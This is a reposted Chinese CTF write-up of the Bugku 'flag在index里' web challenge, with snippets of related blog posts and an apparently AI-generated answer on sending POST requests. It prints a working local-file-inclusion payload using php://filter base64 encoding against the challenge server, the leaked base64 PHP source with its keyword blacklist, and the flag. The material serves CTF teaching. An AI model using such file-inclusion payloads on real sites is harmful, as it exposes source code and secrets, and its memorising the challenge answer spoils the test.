WEB_flag在index里

最新推荐文章于 2024-02-21 23:05:16 发布
转载 最新推荐文章于 2024-02-21 23:05:16 发布 · 671 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Gzu_zb/p/10359059.html
文章标签:

#php #java #人工智能

本文解析了一道CTF题目,通过发现并利用文件包含漏洞,使用PHP封装协议获取index.php源码,从中解密得到FLAG。详细介绍了利用base64编码绕过执行限制,获取注释中FLAG的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

,题目链接:http://123.206.87.240:8005/post/

题解:

打开题目

点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路

题目标题就说明了,flag在index中,要用到php的封装协议,在文件后缀添加  ?file=php://filter/read=convert.base64-encode/resource=index.php

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

进去就能得到一串字符,==结尾,就是BASE64加密了

得到的字符串如下:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

进行BASE64解密,在线解密链接:https://base64.supfree.net/

 得到php源代码,还包含了注释的flag

即flag为:flag{edulcni_elif_lacol_si_siht}

 

下面就本题关键的URL地址信息进行说明:

现在具体说说file=php://filter/read=convert.base64-encode/resource=index.php的含义:

首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

通过传递这个参数可以得到index.php的源码,下面说说为什么,看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的源码。

而include的内容是由用户控制的,所以通过我们传递的file参数,是include()函数引入了index.php的base64编码格式,因为是base64编码格式,所以执行不成功,返回源码,所以我们得到了源码的base64格式,解码即可。

如果不进行base64编码传入,就会直接执行,而flag的信息在注释中,是得不到的。

 

转载于:https://www.cnblogs.com/Gzu_zb/p/10359059.html

ModuleNotFoundError: No module named ‘llama_index.readers“解决方案
weixin_43178406的博客
04-15 7万+
本文主要介绍了ModuleNotFoundError: No module named 'llama_index.readers"解决方案,希望能对使用llama index的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
Flag-Web:Flag 应用程序的服务器后端
06-02
旗帜网 Flag 应用程序的服务器后端
webflag-开源
04-26
webflag是一个基于Web的软件,可以帮助您找到魔兽世界中的其他角色扮演者。 webflag使flagRSP附加组件系列中的字符描述在网络上可用。 您可以根据课程和级别范围搜索RP播放器
Bugku:web flagindex
qq_26961571的博客
06-23 991
这道题本来以为是简单抓包题,没想到是文件包含题目,让我打开了新世界大门。 老规矩,先打开他要求的网页查看。 查看源代码。 并没有什么东西。 点击了之后也是出现一行字。 源代码也没有任何东西。 这时候想到抓包,看了老半天的包,面也是啥都没发现。只能百度了 百度说这是文件包含漏洞,给了一串url命令,主要是让file=index的意思,这岂不是完全依赖于题目提示了,看来题目还是非常关键的东西。 http://123.206...
BugKuCTF WEB flagindex
无限迭代中......
07-09 605
http://123.206.87.240:8005/post/ 题解:本地文件包含漏洞+php伪协议的结合应用 原理:php的封装协议:http://php.net/manual/zh/wrappers.php.php 点击 URL http://123.206.87.240:8005/post/index.php?file=show.php 文件包含漏洞 URL ...
web和pwn题的简单动态flag实现
qq_52820087的博客
11-14 7648
作为一个出题人需要有一些觉悟,这周花了三天时间去研究Dockerfile的写法,主要还是为了实现动态flag,思路理顺了就会发现,原来Dockerfile和动态flag这么简单,这直接现写两个简单的题目来演示一下。使用build命令,构建题目镜像,name为dockerhub名(自行注册登录),webtest为镜像名(自定义),"."为版本号,代表latest,也可以自定义,不过拉取时记得加上版本号。把"start.sh"改为"flag.sh",以下为flag.sh的具体内容。
winXP::chequered_flag:基于Web的Windows XP桌面娱乐
02-02
:chequered_flag: 基于Web的Windows XP桌面娱乐。 特征: 拖动和调整大小,最小化,最大化窗口 从桌面图标或开始菜单打开应用程序 扫雷器,Internet Explorer,我的电脑,记事本,Winamp,油漆 关机菜单 Windows...
Bugku Web CTF-flagIndex
No Title
12-09 1034
Bugku Web CTF-flagIndex 查看网页源码。 <html> <title>Bugku-ctf</title> <a href="./index.php?file=show.php">click me? no</a></html> 观察URL的格式,让人联想到文件包含漏洞。然而并没有看到...
web | CTF】攻防世界 Web_php_unserialize
weixin_46301214的博客
02-21 1237
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
base_web_nginx_php_74:基础知识库WEB Nginx PHP 7.4
03-28
基础知识库WEB Nginx PHP 7.4 L:Linux高山 N:Nginx ...MySQL的 mysqli 例子 用法 ENV FLAG = ctfhub {nginx_php_74} 使用此映像时,应重写flag.sh。 $FLAG不是强制性的,但我希望您能...COPY _files/flag.sh /flag.sh
webflag的python文件
12-14
webflag的一个python文件,怎么用就不用说了吧,随便在一个有python3.0或2.0的机子上就能用了,不过你那个flag的路径在哪,那么你在py文件中的flag路径也得改哈,别傻福福的直接用
WEB_输入密码查看flag
weixin_30505485的博客
02-10 893
题目链接:http://123.206.87.240:8002/baopo/ 题解: 打开题目 再注意题目的地址 提示我们,此题用burp进行爆破,burp软件下载链接:https://pan.baidu.com/s/1daOvlBo-pU2k9WYBN_5EQQ 因此,随便输入一个密码,用burp进行抓包,如我输入密码为12345 进入burp得到下图信息 将其发送...
web flag.php,CTF-WEBPHP 变量
weixin_33514475的博客
03-19 765
目录变量和变量覆盖可变变量一个可变变量 “$$” 获取了一个普通变量的值后,用这个值作为这个可变变量的变量名。一个美元符号表示提取变量中的值,而 2 个连续的美元符号表示用某个变量的内容作为变量名,再来访问该变量。例如以下代码:$a = "b";$b = "c";$c = "a";echo$a; //输出 becho$$a; //输出 cecho$$$a; //...
bugku web flagindex
thinszx的博客
03-09 308
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php伪协议 在php中,有
Web1 信息收集
weixin_53896576的博客
01-17 3227
一、信息收集 1.注意源代码中的注释、源代码链接的奇怪路径,可能会有重要信息。 查看源代码的方式: 右键查看源代码 F12打开开发者⼯具 Ctrl+U 查看 Burp 抓包查看:抓包(packet capture)就是将网络传输发送与接收的数据包进行截获、重发、编辑、转存等操作,也用来检查网络安全。抓包也经常被用来进行数据截取等。 从js代码中获取flag:“网络上的js,一般是指Javascript(简称js),是一种脚本语言,不需要进行编译,也是浏览器中的一部...
CTFshow web入门——信息搜集
小元砸的博客
01-12 4467
web 1 题目:开发注释未及时删除 解题思路:ctrl+u查看源码即可得到flag web 2 题目:js前台拦截 === 无效操作 解题思路:打开可以看到 “无法查看源代码”的字样 但依然可以用ctrl+u的方法查看源码,即可得到flag web 3 题目:没思路的时候抓个包看看,可能会有意外收获 解题思路:F12查看一下响应头即可得到flag web 4 题目:总有人把后台地址写入robots,帮黑阔大佬们引路 解题思路:根据提示访问/robots.txt,会出现:"User-agent: * Di
WEB综合渗透
JJH2724719395的博客
11-22 3934
web综合渗透
Web入门1
2514804004的博客
10-21 1634
web安全入门
CTFd-Web题目动态flag
Elite的博客
11-17 2350
本文详细讲解了如何在ctfd等靶场部署具有动态flagweb题目,并介绍了如何用docker仓库拉取web题目
dianli_jbctf_WEB_01_20150707flag作为参数以POST方式
最新发布
03-28
<think>好的,我现在需要帮助用户了解如何通过POST方式提交参数dianli_jbctf_WEB_01_20150707flag。首先,用户的问题涉及Web开发和HTTP协议,所以我得从这些方面入手。 首先,我要回顾一下POST请求的基本概念。POST是HTTP方法之一,用于向服务器提交数据。通常用于表单提交、文件上传等场景。用户需要发送的参数可能是在某个Web应用的CTF题目中,比如题目要求将特定参数作为POST数据发送到服务器,以获取flag或其他响应。 接下来,我需要考虑如何构造这个POST请求。常见的方法有使用HTML表单、curl命令、Python的requests库,或者浏览器插件如Postman。用户可能对这些方法中的某一种更熟悉,所以应该涵盖几种主要的方式。 然后,根据用户提供的引用内容,特别是引用[1]提到使用PHP://input流或者data URI,这可能涉及到一些CTF中的技巧,比如绕过某些输入过滤。但用户的问题更基础,主要是如何发送POST参数,所以可能需要先介绍标准方法,再提及可能的变通方法。 例如,使用HTML表单的话,需要创建一个form,method设为post,action指向目标URL,然后添加一个隐藏的input字段,name设为参数名,value设为参数值。这种方法直观,但需要用户能够创建并提交表单,可能在实际操作中不太方便,尤其是在CTF环境中可能需要更快捷的方式。 使用curl命令的话,用户可以通过命令行发送POST请求,这在CTF中很常见,因为快速且容易脚本化。命令格式是curl -X POST -d "参数名=参数值" URL。需要确保用户了解如何替换参数名和URL。 Python的requests库也是一个常用的工具,用户可能需要编写一个简单的脚本发送POST请求。代码示例应该简洁,展示如何导入库,构造data字典,发送请求并打印响应。 另外,引用[2]中的题目链接显示了一个需要POST用户名和密码的页面,源代码中的SQL语句提示可能存在SQL注入,但用户的问题是关于发送特定参数,可能与此无关,但可能需要确保参数正确发送到正确的端点。 引用[1]提到的PHP://input流或data URI的方法,可能是在某些限制环境下发送原始POST数据的方式。例如,当应用程序期望接收原始输入而不是表单数据时,可以使用这些方法。例如,使用curl时,通过--data-raw选项发送原始数据,或者在PHP中使用file_get_contents('php://input')来获取数据。但用户的问题可能更关注常规方法,所以这部分可以作为高级技巧提及。 另外,需要注意参数名称是否正确,比如是否区分大小写,是否需要URL编码等。在示例中,参数名是dianli_jbctf_WEB_01_20150707flag,可能不需要编码,但如果有特殊字符,可能需要处理。 总结一下,回答的结构应该是先介绍POST请求的基本概念,然后分步骤说明不同的实现方法,包括HTML表单、curl、Python requests,以及可能的PHP://input方法。同时需要提醒用户注意参数名称的正确性、目标URL是否准确,以及可能的响应处理方式。 另外,用户提供的引用中有提到CTF题目的例子,比如引用[4]中的维吉尼亚解密和引用[5]中的反序列化问题,但这些可能与当前问题关联不大,但需要注意用户可能是在CTF环境中操作,因此可能需要考虑一些绕过技巧,但当前问题更基础,所以可能不需要深入这些方面。 最后,生成相关问题需要考虑用户可能的后续疑问,比如参数编码、工具使用、调试方法、查看响应等,这些都可以作为相关问题提出。</think>### 如何通过POST方式提交参数`dianli_jbctf_WEB_01_20150707flag`? #### 1. **POST请求的基本原理** POST是HTTP协议中用于向服务器提交数据的方法,常用于表单提交、API调用等场景。参数通过请求体(Body)传输,格式可以是表单数据、JSON或纯文本等。在CTF题目中,通常需要构造特定的参数名和值以满足题目要求[^1][^2]。 --- #### 2. **实现方法** ##### **方法一:使用HTML表单** ```html <form action="目标URL" method="POST"> <input type="hidden" name="dianli_jbctf_WEB_01_20150707flag" value="参数值"> <input type="submit" value="提交"> </form> ``` - **说明**:将`action`替换为目标URL(如`http://ctf5.shiyanbar.com/web/baocuo/index.php`),`name`为参数名,`value`为参数值[^2]。 ##### **方法二:使用cURL命令** ```bash curl -X POST -d "dianli_jbctf_WEB_01_20150707flag=参数值" http://目标URL ``` - **说明**:通过命令行工具直接发送POST请求,适合快速测试。例如: ```bash curl -X POST -d "dianli_jbctf_WEB_01_20150707flag=test" http://ctf5.shiyanbar.com/web/baocuo/index.php ``` ##### **方法三:Python的requests库** ```python import requests url = "http://目标URL" data = {"dianli_jbctf_WEB_01_20150707flag": "参数值"} response = requests.post(url, data=data) print(response.text) ``` - **说明**:通过Python脚本灵活控制请求,适合复杂场景[^5]。 ##### **方法四:PHP://input流(高级)** 若题目允许原始输入流,可通过以下方式发送: ```bash curl -X POST --data-raw "dianli_jbctf_WEB_01_20150707flag=参数值" http://目标URL ``` - **说明**:绕过表单封装,直接发送原始数据。 --- #### 3. **注意事项** - **参数名验证**:确保参数名完全匹配(如大小写敏感)[^2]。 - **编码问题**:若参数值含特殊字符(如空格、`&`),需进行URL编码。 - **响应分析**:使用开发者工具(浏览器F12)或抓包工具(如Wireshark)检查服务器返回的HTTP头和内容[^3][^4]。 --- ####
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值